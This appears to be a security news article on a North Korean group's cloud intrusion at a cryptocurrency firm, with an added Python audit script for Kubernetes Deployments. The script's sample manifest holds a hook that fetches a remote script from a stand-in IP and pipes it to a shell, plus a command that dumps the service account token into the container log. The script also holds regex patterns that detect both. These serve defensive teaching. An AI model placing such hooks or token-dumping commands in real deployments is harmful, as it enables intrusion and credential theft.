UNC4899 Breached Crypto Firm After Developer Downloaded Trojanized File to Work Device

Ravie Lakshmanan, March 09, 2026, DevOps / Threat Intelligence

The North Korean threat actor known as UNC4899 is suspected of being behind a sophisticated cloud compromise campaign that targeted a cryptocurrency organization in 2025 and stole millions of dollars in digital assets.

The operation has been attributed with moderate confidence to the state-sponsored adversary, which is also tracked under the names Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor.

"This incident is notable for its combination of social engineering, exploitation of personal device peer-to-peer (P2P) transfer methods and DevOps workflows, and ultimately a pivot into the cloud to implement living-off-the-cloud (LotC) strategies," Google said in its H1 2026 Cloud Threat Horizons Report [PDF], shared with The Hacker News.

Once inside the cloud environment, the attackers are said to have abused legitimate DevOps workflows to harvest data, escape container isolation, and compromise Cloud SQL databases in order to carry out the cryptocurrency theft.

The attack chain, Google Cloud said, was a continuous progression: it began with the compromise of a developer's personal device, moved to the developer's corporate workstation, and then pivoted to the cloud, where the attackers made unauthorized changes to financial logic.

It all started with the threat actors using social engineering to trick a developer into downloading an archive file as part of a supposed open source project collaboration. The engineer then transferred the same file to their company-issued device via AirDrop.

"Using an AI-assisted Integrated Development Environment (IDE), the victim then interacted with the contents of the archive, eventually executing embedded Python code, which generated and ran a binary that masqueraded as the Kubernetes command-line tool," Google said.

The binary then contacted an attacker-controlled domain and acted as a gateway into the victim's corporate machine, giving the attackers a way into the Google Cloud environment by reusing authenticated sessions and the credentials available on the host. This was followed by an initial reconnaissance phase aimed at gathering information about the organization's various services and projects.

The attack moved to the next stage with the discovery of a bastion host. The adversary modified a multi-factor authentication (MFA) policy attribute to gain access to it and performed further reconnaissance, including navigating to specific pods within the Kubernetes environment.

Later, UNC4899 adopted a living-off-the-cloud (LotC) approach to establish persistence, modifying a Kubernetes deployment configuration so that a bash command ran automatically whenever new pods were created. That command, in turn, downloaded a backdoor.

Some of the steps taken by the threat actor are listed below –

  • Kubernetes services bound to the victim's CI/CD platform were modified to inject commands that printed service account tokens into the logs.
  • The attacker obtained a high-privilege CI/CD service account token, allowing them to escalate privileges and move laterally, specifically targeting the pod that manages network policies and load balancing.
  • The stolen service account token was used to authenticate to a sensitive infrastructure pod running in privileged mode, escape the container, and deploy a backdoor for continued access.
  • The threat actor carried out another round of reconnaissance before focusing on the workload responsible for managing customer information, such as user identity, account security, and crypto wallet data.
  • From that workload, the attacker extracted static database credentials that were stored insecurely in pod environment variables.
  • Those credentials were then used to access the production database via the Cloud SQL Auth Proxy and execute SQL commands that altered user accounts, including password resets and MFA seed updates for a handful of high-value accounts.
  • The attack culminated in the use of the compromised accounts to withdraw several million dollars in digital assets.
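Four of the pod-level weaknesses in this chain are visible in the Deployment object itself: a start-up hook that fetches and runs a remote payload (the persistence change), a command that dumps the service account token into the container log, a container running in privileged mode, and a static database credential sitting in a plain environment variable. The audit below, added here as an example and not code from Google or from the victim, walks a Deployment's pod template (the structure `kubectl get deploy -o json` returns) and reports each of those patterns. The manifest is a constructed sample that shows all four at once; it is not the victim's deployment, and the assumption that the persistence change took the form of a `postStart` hook is ours, since the report only says a bash command ran whenever new pods were created.

```python
"""Audit Kubernetes Deployment objects for the pod-level weaknesses the article
describes: a start-up hook that fetches and runs a remote payload, a command
that dumps the service account token into the container log, a privileged
container, and a static credential in a plain env var.
Added example (not Google's or the victim's code); the manifest below is a
constructed sample, not the actual deployment from the incident."""
import re

# A shell fragment that downloads a remote script and pipes it into a shell,
# or substitutes the download into `sh -c`.
REMOTE_FETCH = re.compile(
    r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b|\b(ba)?sh\s+-c\s+[\"']?\$\((curl|wget)\b"
)
# Any reference to the projected service account token directory.
SA_TOKEN_PATH = re.compile(r"/var/run/secrets/kubernetes\.io/serviceaccount")
# Env var names that normally hold a credential.
SECRET_NAME = re.compile(r"PASS|SECRET|TOKEN|KEY|CREDENTIAL", re.I)

# Constructed sample: one CI runner pod exhibiting all four issues at once.
SAMPLE_DEPLOYMENT = {
    "kind": "Deployment",
    "metadata": {"name": "ci-runner", "namespace": "cicd"},
    "spec": {"template": {"spec": {"containers": [{
        "name": "runner",
        "image": "registry.example.internal/ci-runner:latest",  # hypothetical registry
        "command": ["/bin/sh", "-c",
                    "cat /var/run/secrets/kubernetes.io/serviceaccount/token; exec /runner"],
        "securityContext": {"privileged": True},
        "env": [
            {"name": "DB_USER", "value": "app"},
            {"name": "DB_PASSWORD", "value": "s3cr3t-static"},      # flagged: literal secret
            {"name": "API_TOKEN", "valueFrom": {"secretKeyRef": {   # not flagged: Secret ref
                "name": "api-creds", "key": "token"}}},
        ],
        # Assumed shape of the persistence change: a hook run on every new pod.
        "lifecycle": {"postStart": {"exec": {"command": [
            "/bin/sh", "-c", "curl -s http://198.51.100.7/x.sh | sh"]}}},  # TEST-NET-2 address
    }]}}},
}


def _shell_strings(container):
    """Yield (location, string) for every place a container can run a command."""
    for key in ("command", "args"):
        for s in container.get(key, []):
            yield key, s
    lifecycle = container.get("lifecycle", {})
    for hook in ("postStart", "preStop"):
        for s in lifecycle.get(hook, {}).get("exec", {}).get("command", []):
            yield f"lifecycle.{hook}", s


def audit_pod_spec(pod_spec):
    """Return a list of findings, each {'check', 'container', 'detail'}."""
    findings = []
    if pod_spec.get("hostPID") or pod_spec.get("hostNetwork"):
        findings.append({"check": "host_namespace", "container": None,
                         "detail": "pod shares the host PID or network namespace"})
    for kind in ("initContainers", "containers"):
        for c in pod_spec.get(kind, []):
            name = c.get("name", "?")
            for loc, s in _shell_strings(c):
                if REMOTE_FETCH.search(s):
                    findings.append({"check": "remote_fetch", "container": name,
                                     "detail": f"{loc}: {s}"})
                if SA_TOKEN_PATH.search(s):
                    findings.append({"check": "sa_token_read", "container": name,
                                     "detail": f"{loc}: {s}"})
            if c.get("securityContext", {}).get("privileged"):
                findings.append({"check": "privileged", "container": name,
                                 "detail": "securityContext.privileged is true"})
            for env in c.get("env", []):
                # A literal `value` under a credential-looking name is a static secret;
                # `valueFrom` (Secret or ConfigMap reference) is the expected form.
                if "value" in env and SECRET_NAME.search(env.get("name", "")):
                    findings.append({"check": "static_secret", "container": name,
                                     "detail": f"env {env['name']} set as a literal value"})
    return findings


def audit_deployment(deployment):
    """Audit the pod template of a Deployment (anything with spec.template.spec)."""
    return audit_pod_spec(deployment["spec"]["template"]["spec"])


if __name__ == "__main__":
    for f in audit_deployment(SAMPLE_DEPLOYMENT):
        print(f"[{f['check']}] {f['container']}: {f['detail']}")
```

To run it against a live cluster, pipe `kubectl get deploy -A -o json` through `json.load` and call `audit_deployment` on each entry in `items`; the same function works on DaemonSets and StatefulSets, since they share the `spec.template.spec` layout. The regexes are deliberately narrow, so treat a clean result as the absence of these four specific patterns rather than as a clean bill of health.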

The incident "highlights the serious risks posed by personal-to-business P2P data transfer methods and other data bridges, privileged container configurations, and insecure secrets management in cloud environments," Google said. "Organizations must adopt a defense-in-depth strategy that strongly enforces identity, restricts data transfer to endpoints, and enforces strict separation between cloud runtime environments to limit the blast radius of an intrusion event."

To counter the threat, organizations are advised to use context-aware access and phishing-resistant MFA, ensure that only trusted container images can be deployed, prevent compromised nodes from establishing connections to external hosts, monitor for unexpected container processes, adopt strong secrets management, and implement policies that disable or restrict peer-to-peer file sharing such as AirDrop and other Bluetooth file transfers on managed devices.
